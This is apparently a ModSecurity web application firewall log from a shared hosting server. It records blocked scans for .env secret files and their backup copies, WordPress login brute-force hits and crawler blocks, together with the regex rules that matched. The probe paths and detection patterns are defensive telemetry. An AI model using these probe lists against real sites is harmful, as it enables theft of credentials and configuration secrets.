[Tue May 26 13:09:40.452513 2026] [security2:error] [pid 496740:tid 496902] [client 4.194.232.122:46454] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "162.215.241.212"] [uri "/"] [unique_id "ahVOPOvOeft4ltnLrH4bpwAAACA"]
[Tue May 26 13:09:42.044696 2026] [security2:error] [pid 496740:tid 496936] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOPevOeft4ltnLrH4b4QAAAEI"]
[Tue May 26 13:09:44.516831 2026] [security2:error] [pid 496740:tid 496892] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOQOvOeft4ltnLrH4cZAAAABY"]
[Tue May 26 13:09:46.890103 2026] [security2:error] [pid 496740:tid 496807] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/install.php"] [unique_id "ahVOQuvOeft4ltnLrH4c9AAAYEI"]
[Tue May 26 13:09:46.900497 2026] [security2:error] [pid 496740:tid 496785] [remote 18.190.7.192:35210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVOQuvOeft4ltnLrH4c5AAAGyw"]
[Tue May 26 13:09:46.916399 2026] [security2:error] [pid 496740:tid 496984] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOQuvOeft4ltnLrH4c2gAAAHI"]
[Tue May 26 13:09:47.870349 2026] [security2:error] [pid 496740:tid 496792] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/setup.php"] [unique_id "ahVOQ-vOeft4ltnLrH4dKQAAPDM"]
[Tue May 26 13:09:49.134103 2026] [security2:error] [pid 496740:tid 496979] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOROvOeft4ltnLrH4dTwAAAG0"]
[Tue May 26 13:09:52.288526 2026] [security2:error] [pid 496740:tid 496922] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOR-vOeft4ltnLrH4d0gAAADQ"]
[Tue May 26 13:09:53.351230 2026] [security2:error] [pid 496740:tid 496848] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/error.php"] [unique_id "ahVOSevOeft4ltnLrH4eCgAANms"]
[Tue May 26 13:09:56.594902 2026] [security2:error] [pid 496740:tid 496964] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOTOvOeft4ltnLrH4ecAAAAF4"]
[Tue May 26 13:09:57.525959 2026] [security2:error] [pid 496740:tid 496962] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOTevOeft4ltnLrH4emQAAAFw"]
[Tue May 26 13:09:58.434098 2026] [security2:error] [pid 496740:tid 496880] [client 123.31.201.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOTuvOeft4ltnLrH4fLAAAAAo"]
[Tue May 26 13:09:59.992081 2026] [security2:error] [pid 496740:tid 496927] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOT-vOeft4ltnLrH4feQAAADk"]
[Tue May 26 13:10:02.458263 2026] [security2:error] [pid 496740:tid 496962] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOUevOeft4ltnLrH4f-wAAAFw"]
[Tue May 26 13:10:03.023736 2026] [security2:error] [pid 496740:tid 496844] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/connector.php"] [unique_id "ahVOU-vOeft4ltnLrH4gHwAAVGc"]
[Tue May 26 13:10:03.715106 2026] [security2:error] [pid 496740:tid 496883] [client 142.248.80.209:50656] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/backend/.env"] [unique_id "ahVOU-vOeft4ltnLrH4gPgAAAA0"]
[Tue May 26 13:10:03.717419 2026] [security2:error] [pid 496740:tid 496907] [client 142.248.80.209:50646] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/app/.env"] [unique_id "ahVOU-vOeft4ltnLrH4gQQAAACU"]
[Tue May 26 13:10:03.735409 2026] [security2:error] [pid 496740:tid 496992] [client 142.248.80.209:50654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/api/.env"] [unique_id "ahVOU-vOeft4ltnLrH4gRAAAAHo"]
[Tue May 26 13:10:04.042128 2026] [security2:error] [pid 496740:tid 496890] [client 142.248.80.209:50568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env"] [unique_id "ahVOVOvOeft4ltnLrH4gXgAAABQ"]
[Tue May 26 13:10:04.407447 2026] [ssl:error] [pid 496740:tid 496956] [client 3.233.59.216:35877] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpcalendars.omshriinfra.omshriinfrastructures.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:10:05.357689 2026] [security2:error] [pid 496740:tid 496942] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOVOvOeft4ltnLrH4ggwAAAEg"]
[Tue May 26 13:10:06.147505 2026] [security2:error] [pid 496740:tid 496934] [client 94.26.106.90:55078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.ustechinformation.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVOVuvOeft4ltnLrH4grAAAAEA"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 13:10:06.517127 2026] [security2:error] [pid 496740:tid 496986] [client 142.248.80.209:50800] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.copy"] [unique_id "ahVOVuvOeft4ltnLrH4gxAAAAHQ"]
[Tue May 26 13:10:06.522799 2026] [security2:error] [pid 496740:tid 496915] [client 94.26.106.90:62758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.ustechinformation.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVOVuvOeft4ltnLrH4gxgAAAC0"], referer: https://duckduckgo.com/
[Tue May 26 13:10:06.565101 2026] [security2:error] [pid 496740:tid 496924] [client 185.191.171.4:46094] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/cheer/list/"] [unique_id "ahVOVuvOeft4ltnLrH4gygAAADY"]
[Tue May 26 13:10:06.565211 2026] [security2:error] [pid 496740:tid 496924] [client 185.191.171.4:46094] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/cheer/list/"] [unique_id "ahVOVuvOeft4ltnLrH4gygAAADY"]
[Tue May 26 13:10:06.817930 2026] [security2:error] [pid 496740:tid 496963] [client 142.248.80.209:51000] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.bak"] [unique_id "ahVOVuvOeft4ltnLrH4g1AAAAF0"]
[Tue May 26 13:10:06.819262 2026] [security2:error] [pid 496740:tid 496888] [client 142.248.80.209:50986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.copy"] [unique_id "ahVOVuvOeft4ltnLrH4g2QAAABI"]
[Tue May 26 13:10:06.819590 2026] [security2:error] [pid 496740:tid 496942] [client 142.248.80.209:50984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.orig"] [unique_id "ahVOVuvOeft4ltnLrH4g1QAAAEg"]
[Tue May 26 13:10:06.819652 2026] [security2:error] [pid 496740:tid 496886] [client 142.248.80.209:50966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local~"] [unique_id "ahVOVuvOeft4ltnLrH4g1wAAABA"]
[Tue May 26 13:10:06.820027 2026] [security2:error] [pid 496740:tid 496944] [client 142.248.80.209:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.backup"] [unique_id "ahVOVuvOeft4ltnLrH4g1gAAAEo"]
[Tue May 26 13:10:06.820289 2026] [security2:error] [pid 496740:tid 496966] [client 142.248.80.209:50904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.copy"] [unique_id "ahVOVuvOeft4ltnLrH4g3QAAAGA"]
[Tue May 26 13:10:06.820370 2026] [security2:error] [pid 496740:tid 496926] [client 142.248.80.209:50920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.bak"] [unique_id "ahVOVuvOeft4ltnLrH4g2wAAADg"]
[Tue May 26 13:10:06.821012 2026] [security2:error] [pid 496740:tid 496967] [client 142.248.80.209:50972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.swp"] [unique_id "ahVOVuvOeft4ltnLrH4g2gAAAGE"]
[Tue May 26 13:10:06.821242 2026] [security2:error] [pid 496740:tid 496960] [client 142.248.80.209:50934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.local.old"] [unique_id "ahVOVuvOeft4ltnLrH4g3AAAAFo"]
[Tue May 26 13:10:06.833508 2026] [security2:error] [pid 496740:tid 496887] [client 142.248.80.209:50890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.orig"] [unique_id "ahVOVuvOeft4ltnLrH4g3gAAABE"]
[Tue May 26 13:10:06.834175 2026] [security2:error] [pid 496740:tid 496898] [client 142.248.80.209:50848] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.backup"] [unique_id "ahVOVuvOeft4ltnLrH4g5AAAABw"]
[Tue May 26 13:10:06.835001 2026] [security2:error] [pid 496740:tid 496882] [client 142.248.80.209:50838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.old"] [unique_id "ahVOVuvOeft4ltnLrH4g6AAAAAw"]
[Tue May 26 13:10:06.835127 2026] [security2:error] [pid 496740:tid 496984] [client 142.248.80.209:50834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.bak"] [unique_id "ahVOVuvOeft4ltnLrH4g5wAAAHI"]
[Tue May 26 13:10:06.835219 2026] [security2:error] [pid 496740:tid 496919] [client 142.248.80.209:50818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.backup"] [unique_id "ahVOVuvOeft4ltnLrH4g5gAAADE"]
[Tue May 26 13:10:06.835510 2026] [security2:error] [pid 496740:tid 496897] [client 142.248.80.209:50800] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production~"] [unique_id "ahVOVuvOeft4ltnLrH4g6wAAABs"]
[Tue May 26 13:10:06.835792 2026] [security2:error] [pid 496740:tid 496879] [client 142.248.80.209:50876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.swp"] [unique_id "ahVOVuvOeft4ltnLrH4g4gAAAAk"]
[Tue May 26 13:10:06.836235 2026] [security2:error] [pid 496740:tid 496954] [client 142.248.80.209:50826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.old"] [unique_id "ahVOVuvOeft4ltnLrH4g5QAAAFQ"]
[Tue May 26 13:10:06.836902 2026] [security2:error] [pid 496740:tid 496939] [client 142.248.80.209:50860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env~"] [unique_id "ahVOVuvOeft4ltnLrH4g6QAAAEU"]
[Tue May 26 13:10:07.120574 2026] [security2:error] [pid 496740:tid 496900] [client 142.248.80.209:51062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.swp"] [unique_id "ahVOV-vOeft4ltnLrH4g9AAAAB4"]
[Tue May 26 13:10:07.120879 2026] [security2:error] [pid 496740:tid 496955] [client 142.248.80.209:51046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "waveit.in"] [uri "/.env.production.orig"] [unique_id "ahVOV-vOeft4ltnLrH4g9QAAAFU"]
[Tue May 26 13:10:07.666682 2026] [security2:error] [pid 496740:tid 496989] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOV-vOeft4ltnLrH4g_QAAAHc"]
[Tue May 26 13:10:09.316856 2026] [security2:error] [pid 496740:tid 496771] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/cron.php"] [unique_id "ahVOWevOeft4ltnLrH4hRwAARh4"]
[Tue May 26 13:10:10.192169 2026] [security2:error] [pid 496740:tid 496879] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOWevOeft4ltnLrH4hVwAAAAk"]
[Tue May 26 13:10:12.957579 2026] [security2:error] [pid 496740:tid 496884] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOXOvOeft4ltnLrH4h0QAAAA4"]
[Tue May 26 13:10:14.204302 2026] [security2:error] [pid 496740:tid 496971] [client 142.147.199.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVOXevOeft4ltnLrH4iDgAAAGU"]
[Tue May 26 13:10:15.455099 2026] [security2:error] [pid 496740:tid 496953] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOX-vOeft4ltnLrH4iTgAAAFM"]
[Tue May 26 13:10:16.669271 2026] [security2:error] [pid 496740:tid 496994] [client 2a02:c207:3010:7548::1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVOYOvOeft4ltnLrH4idwAAfFA"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 13:10:18.056329 2026] [security2:error] [pid 496740:tid 496986] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOYevOeft4ltnLrH4ivAAAAHQ"]
[Tue May 26 13:10:18.717397 2026] [security2:error] [pid 496740:tid 496889] [client 66.132.172.131:10408] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVOYuvOeft4ltnLrH4ixgAAABM"]
[Tue May 26 13:10:20.528985 2026] [security2:error] [pid 496740:tid 496911] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOZOvOeft4ltnLrH4jDwAAACk"]
